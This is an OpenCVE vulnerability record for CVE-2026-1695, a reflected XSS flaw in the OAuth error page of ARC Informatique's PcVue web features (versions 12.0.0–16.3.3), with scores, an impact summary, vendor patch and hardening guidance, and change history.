Description
An XSS vulnerability affects the OAuth web services used by the WebVue, WebScheduler, TouchVue and SnapVue features of PcVue in version 12.0.0 through 16.3.3 included. It might allow a remote attacker to trick a legitimate user into loading content from another site upon unsuccessful user authentication on an unknown application (unknown client_id).

This vulnerability only affects the error page of the OAuth server.
Published: 2026-02-26
Score: 5.3 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑site scripting via OAuth error page after failed authentication
Action: Apply Patch
AI Analysis

Impact

An XSS flaw exists in the OAuth web services used by PcVue’s WebVue, WebScheduler, TouchVue and SnapVue components in versions 12.0.0 through 16.3.3. When an authentication attempt fails for an unknown client_id, the OAuth server serves an error page that fails to neutralize user‑supplied input. A remote actor could embed a malicious script in that error page, causing any user who experiences the failed login to load content from a third‑party site. The defect is a classic reflected XSS issue (CWE‑79) that may be leveraged for phishing, credential theft, or code execution within the victim’s browser session.

Affected Systems

Affected products are Arcinfo’s PcVue platform, specifically the WebVue, WebScheduler, TouchVue and SnapVue features. The vulnerability is present in all releases from version 12.0.0 up to 16.3.3 inclusive. Patches are available in PcVue 16.3.4 (build 16.3.4902.3112) and PcVue 15.2.14 (build 15.2.14900.37147). Systems running earlier releases should apply the corresponding patch or remove the Web & Mobile components if they are not in use.

Risk and Exploitability

The CVSS score of 5.3 indicates moderate severity, while the EPSS score of < 1 % reflects a very low likelihood of exploitation in the wild, and the vulnerability is not yet listed in the CISA KEV catalog. The exploit requires a remote attacker to trigger a failed OAuth authentication for an unknown client; the error page then renders user‑controlled content, which an attacker can manipulate. Because the flaw is confined to the error page and does not affect authenticated traffic, the impact is limited to the victim’s browser session, yet it can still enable social-engineering attacks against legitimate users. Administrators should treat this as an actionable risk and apply the vendor‑issued patch promptly while limiting exposure of the affected control‑system network.

Generated by OpenCVE AI on April 16, 2026 at 06:04 UTC.

Remediation

Vendor Solution

Harden the configuration Who should apply this recommendation: All users To reduce the risk of exploitation, ARC Informatique strongly recommends implementing the following defensive measures: * Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from insecure networks. * Locate control system networks and remote devices behind firewalls and isolate them from business networks. * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices. Uninstall the Web Server Who should apply this recommendation: All users not using the affected component If your system does not require the use of the Web & Mobile features, you should make sure not to install them. If your system requires the use of the Web & Mobile features, they should be installed only on the Web Server. See the product help related to the installation for more information. Update the Web Deployment Console (WDC) and re deploy the Web Server Who should apply this recommendation: All users running affected components. Install a patched release of the Web Deployment Console (WDC) on the IIS Web server and use it to re-deploy the Web Site. Some settings might need to be updated if third-party web apps or services depend on the OAuth ROPC flow. In a patched release of the WDC, new settings are available for each authorized Client to enable or disable: * The Authorization Code flow * The Authorization Code flow with PKCE * The Resource Owner Password Credentials (ROPC) flow By default, all the OAuth flows are now disabled for third-party web apps and need to be manually enabled before deployment if required. To verify that the patch is applied correctly, you must check that: * The File version property of the file ./bin/Modules/WebDeployment/WebDeploymentConsole.exe matches the deployed release or later, and ensure that any earlier release is no longer used; * Web Sites have been redeployed; * OAuth flow are correctly set for each authorized Client. Available patches: Patch provided in: * PcVue 16.3.4 (16.3.4902.3112) * PcVue 15.2.14 (15.2.14900.37147)

OpenCVE Recommended Actions

  • Deploy the latest patched release of the Web Deployment Console (e.g., PcVue 16.3.4) on the IIS Web server and redeploy the WebVue site.
  • Verify that the patch is active by confirming the File version property of ./bin/Modules/WebDeployment/WebDeploymentConsole.exe and ensuring all OAuth flows are configured correctly for authorized clients.
  • If your deployment does not require Web & Mobile features, uninstall the Web Server component to eliminate the vulnerable surface.
  • Apply network hardening measures: isolate control‑system networks from business networks, limit external access, and use VPN with up‑to‑date encryption when remote access is necessary.

Generated by OpenCVE AI on April 16, 2026 at 06:04 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

References
Link Providers
https://www.pcvue.com/security/#SB2026-2 cve-icon cve-icon
History

Thu, 12 Mar 2026 14:00:00 +0000

Type Values Removed Values Added
First Time appeared Arcinformatique
Arcinformatique pcvue
CPEs cpe:2.3:a:arcinformatique:pcvue:*:*:*:*:*:*:*:*
Vendors & Products Arcinformatique
Arcinformatique pcvue
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}

Thu, 26 Feb 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 26 Feb 2026 08:15:00 +0000

Type Values Removed Values Added
Description An XSS vulnerability affects the OAuth web services used by the WebVue, WebScheduler, TouchVue and SnapVue features of PcVue in version 12.0.0 through 16.3.3 included. It might allow a remote attacker to trick a legitimate user into loading content from another site upon unsuccessful user authentication on an unknown application (unknown client_id). This vulnerability only affects the error page of the OAuth server.
Title XSS vulnerability upon unsuccessful authentication
First Time appeared Arcinfo
Arcinfo pcvue
Weaknesses CWE-79
CPEs cpe:2.3:a:arcinfo:pcvue:*:*:*:*:*:*:*:*
cpe:2.3:a:arcinfo:pcvue:12.0.0:*:*:*:*:*:*:*
Vendors & Products Arcinfo
Arcinfo pcvue
References
Metrics cvssV4_0

{'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:N/AU:Y/R:U/RE:M/U:Clear'}

Subscriptions

Arcinfo Pcvue
Arcinformatique Pcvue
cve-icon MITRE

Status: PUBLISHED

Assigner: arcinfo

Published:

Updated: 2026-03-26T08:23:05.985Z

Reserved: 2026-01-30T08:38:05.262Z

Link: CVE-2026-1695

cve-icon Vulnrichment

Updated: 2026-02-26T14:21:26.525Z

cve-icon NVD

Status : Analyzed

Published: 2026-02-26T08:16:19.063

Modified: 2026-03-12T13:50:53.330

Link: CVE-2026-1695

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T06:15:26Z

Weaknesses